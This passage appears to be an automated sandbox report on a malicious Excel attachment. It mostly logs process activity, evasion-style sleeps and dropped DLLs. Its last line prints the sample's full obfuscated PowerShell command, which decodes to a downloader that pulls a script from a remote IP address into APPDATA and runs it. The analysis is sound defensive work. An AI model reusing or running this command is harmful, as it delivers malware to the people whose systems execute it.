        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: Euro confirmation Sp.xlsStream path 'MBD00609F23/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
        Source: Euro confirmation Sp.xlsStream path 'Workbook' entropy: 7.99857198207 (max. 8.0)
        Source: ~DF634BD35CC9B94982.TMP.0.drStream path 'MBD00609F23/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
        Source: ~DF634BD35CC9B94982.TMP.0.drStream path 'Workbook' entropy: 7.99857198207 (max. 8.0)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C2C63 sldt ax7_2_000007FE899C2C63
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2971Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6977Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1112Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8730Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1821
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 728
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1560
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6453
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.dllJump to dropped file
        Source: C:\Windows\System32\mshta.exe TID: 3900Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep count: 2971 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep count: 6977 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984Thread sleep time: -10145709240540247s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Windows\System32\mshta.exe TID: 1216Thread sleep time: -360000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 808Thread sleep count: 1821 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928Thread sleep count: 728 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3628Thread sleep time: -120000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780Thread sleep count: 1560 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep count: 6453 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792Thread sleep time: -14757395258967632s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792Thread sleep time: -1800000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792Thread sleep time: -600000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2956, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTR
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
